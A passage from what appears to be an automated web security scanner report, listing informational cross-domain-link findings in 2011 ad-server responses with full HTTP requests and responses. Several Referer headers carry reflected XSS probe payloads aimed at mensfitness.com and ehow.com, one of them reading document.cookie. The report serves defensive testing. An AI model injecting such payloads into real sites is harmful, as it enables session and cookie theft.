document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa6/0/0/%2a/e;233612098;0-0;0;38964796;33727-1020/200;39983264/40001051/1;;~aopt=2/0/ff/0;~sscs=%3fhttp://tracking.searchmarketing.com/click.asp?aid=744664787"><img src="http://s0.2mdn.net/viewad/2652201/MensFitness_NO2Red_1020x200.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.36. http://ad.doubleclick.net/adj/ami.mf.fitness/abs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ami.mf.fitness/abs

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ami.mf.fitness/abs;sz=120x90;tile=6;aid=136;ord=7511884768027812?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/ami.mf.fitness/abs;sz=120x90;tile=6;aid=136;ord=7511884768027812? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/136?cid=RSS
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 14:26:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 258

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa6/0/0/%2a/t;44306;0-0;0;38964796;2-120/90;0/0/0;;~aopt=2/0/ff/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.37. http://ad.doubleclick.net/adj/ami.mf.home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ami.mf.home/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ami.mf.home/;sz=300x90;tile=10;ord=7511884768027812?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1798245/metrx-300x90.jpg

Request

GET /adj/ami.mf.home/;sz=300x90;tile=10;ord=7511884768027812? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/136?cid=RSS
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 14:27:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 331

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa6/0/0/%2a/y;234511616;0-0;0;14443770;3393-300/90;40049918/40067705/1;;~aopt=2/0/ff/0;~sscs=%3fhttp://www.mensfitness.com/cc/gladiator/"><img src="http://s0.2mdn.net/viewad/1798245/metrx-300x90.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.38. http://ad.doubleclick.net/adj/dmd.ehow/computers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/dmd.ehow/computers

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/dmd.ehow/computers;cat=computersoftware;scat=;sscat=;art=;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=1;rsi=;tile=1;dcopt=ist;sz=249x77;ord=4760230283606905?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/dmd.ehow/computers;cat=computersoftware;scat=;sscat=;art=;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=1;rsi=;tile=1;dcopt=ist;sz=249x77;ord=4760230283606905? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 02 Feb 2011 15:13:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 262

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa2/0/0/%2a/t;44306;0-0;0;45421603;37789-249/77;0/0/0;;~aopt=2/0/36/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.39. http://ad.doubleclick.net/adj/dmd.ehow/gen previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/dmd.ehow/gen

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/dmd.ehow/gen;vid=0;ugc=0;rsi=;tile=1;dcopt=ist;sz=249x77;ord=2257501050949795?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/dmd.ehow/gen;vid=0;ugc=0;rsi=;tile=1;dcopt=ist;sz=249x77;ord=2257501050949795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 02 Feb 2011 15:12:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 262

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa2/0/0/%2a/k;44306;0-0;0;51754065;37789-249/77;0/0/0;;~aopt=2/0/36/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.40. http://ad.doubleclick.net/adj/dmd.ehow/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/dmd.ehow/homepage

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/dmd.ehow/homepage;vid=0;ugc=0;tile=2;sz=470x40;ord=6738201569178236?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2617539/eHowAtHomeAd.jpg

Request

GET /adj/dmd.ehow/homepage;vid=0;ugc=0;tile=2;sz=470x40;ord=6738201569178236? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 02 Feb 2011 15:11:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 320

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa2/0/0/%2a/l;227540386;0-0;0;45421688;27016-470/40;37833391/37851239/1;;~aopt=2/0/36/0;~sscs=%3fhttp://www.ehow.com/at-home/"><img src="http://s0.2mdn.net/viewad/2617539/eHowAtHomeAd.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.41. http://ad.doubleclick.net/adj/dmd.ehow/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/dmd.ehow/homepage

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/dmd.ehow/homepage;vid=0;ugc=0;lvl=4;sz=249x77;dcopt=ist;tile=1;ord=2735259747132?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/dmd.ehow/homepage;vid=0;ugc=0;lvl=4;sz=249x77;dcopt=ist;tile=1;ord=2735259747132? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 02 Feb 2011 15:11:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 262

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa2/0/0/%2a/l;44306;0-0;0;45421688;37789-249/77;0/0/0;;~aopt=2/0/36/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.42. http://ad.harrenmedianetwork.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.harrenmedianetwork.com
Path:	/st

Issue detail

The page was loaded from a URL containing a query string:

http://ad.harrenmedianetwork.com/st?ad_type=iframe&ad_size=160x600&section=429613

The response contains the following links to other domains:

http://ad.yieldmanager.com/imageclick?Z=160x600&s=429613&t=2
http://ad.yieldmanager.com/imp?Z=160x600&s=429613&t=2

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:54 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:54 GMT
Content-Length: 521
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600&inv_code=429613&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanme
...[SNIP]...
<noscript><a href="http://ad.yieldmanager.com/imageclick?Z=160x600&s=429613&t=2" target="parent"><img border="0" src="http://ad.yieldmanager.com/imp?Z=160x600&s=429613&t=2"></img>
...[SNIP]...

17.43. http://ad.harrenmedianetwork.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.harrenmedianetwork.com
Path:	/st

Issue detail

The page was loaded from a URL containing a query string:

http://ad.harrenmedianetwork.com/st?ad_type=iframe&ad_size=728x90&section=429588&pop_nofreqcap=1

The response contains the following links to other domains:

http://ad.yieldmanager.com/imageclick?Z=728x90&s=429588&t=2
http://ad.yieldmanager.com/imp?Z=728x90&s=429588&t=2

Request

GET /st?ad_type=iframe&ad_size=728x90&section=429588&pop_nofreqcap=1 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:54 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:54 GMT
Content-Length: 537
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=728x90&inv_code=429588&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmem
...[SNIP]...
<noscript><a href="http://ad.yieldmanager.com/imageclick?Z=728x90&s=429588&t=2" target="parent"><img border="0" src="http://ad.yieldmanager.com/imp?Z=728x90&s=429588&t=2"></img>
...[SNIP]...

17.44. http://ad.reduxmedia.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.reduxmedia.com
Path:	/st

Issue detail

The page was loaded from a URL containing a query string:

http://ad.reduxmedia.com/st?ad_type=iframe&ad_size=120x600&section=681714

The response contains the following link to another domain:

http://content.yieldmanager.com/ak/q.gif

Request

GET /st?ad_type=iframe&ad_size=120x600&section=681714 HTTP/1.1
Host: ad.reduxmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:17:58 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 19:17:58 GMT
Pragma: no-cache
Content-Length: 4546
Age: 0
Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
</noscript><img src="http://content.yieldmanager.com/ak/q.gif" style="display:none" width="1" height="1" border="0" alt="" /></body>
...[SNIP]...

17.45. http://ad.scanmedios.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.scanmedios.com
Path:	/st

Issue detail

The page was loaded from a URL containing a query string:

http://ad.scanmedios.com/st?ad_type=iframe&ad_size=300x250&section=601669

The response contains the following links to other domains:

http://ad.yieldmanager.com/imageclick?Z=300x250&s=601669&t=2
http://ad.yieldmanager.com/imp?Z=300x250&s=601669&t=2

Request

GET /st?ad_type=iframe&ad_size=300x250&section=601669 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:00 GMT
Content-Length: 521
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250&inv_code=601669&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanme
...[SNIP]...
<noscript><a href="http://ad.yieldmanager.com/imageclick?Z=300x250&s=601669&t=2" target="parent"><img border="0" src="http://ad.yieldmanager.com/imp?Z=300x250&s=601669&t=2"></img>
...[SNIP]...

17.46. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae

The response contains the following links to other domains:

http://ad-emea.doubleclick.net/ad/N5506.150290.INVITEMEDIA/B5070033.24;abr=!ie4;abr=!ie5;sz=300x250;ord=1296659628?
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
http://ad-emea.doubleclick.net/adj/N5506.150290.INVITEMEDIA/B5070033.24;abr=!ie;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=http://ad-emea.doubleclick.net/jump/N5506.150290.INVITEMEDIA/B5070033.24;abr=!ie4;abr=!ie5;sz=300x250;ord=1296659628?
http://pixel.invitemedia.com/data_sync?partner_id=219
http://t.invitemedia.com/track_imp?partnerID=219&campID=67677&crID=87798&auctionID=12966596281452839-87798&cost=0.3868&pubICode=1502951&pub=58661&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F

Request

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:13:48 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: ad0269.2rm.ac4
Set-Cookie: ih="b!!!!=!(4vA!!!!#<kc#t!(mhO!!!!#<lEK*!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0"; path=/; expires=Fri, 01-Feb-2013 15:13:48 GMT
Set-Cookie: vuday1=_UO8O5_x-d!>[UWGM:%]; path=/; expires=Thu, 03-Feb-2011 00:00:00 GMT
Set-Cookie: lifb=ty?i)oaEEn%y_Qs7i<Qa>BiQOJap]T6KK(#; path=/; expires=Wed, 02-Feb-2011 20:10:40 GMT
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 15:13:48 GMT
Pragma: no-cache
Content-Length: 4494
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8172631);}
</script><IFRAME SRC="http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad-emea.doubleclick.net/adj/N5506.150290.INVITEMEDIA/B5070033.24;abr=!ie;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?">
</SCRIPT>
<NOSCRIPT>
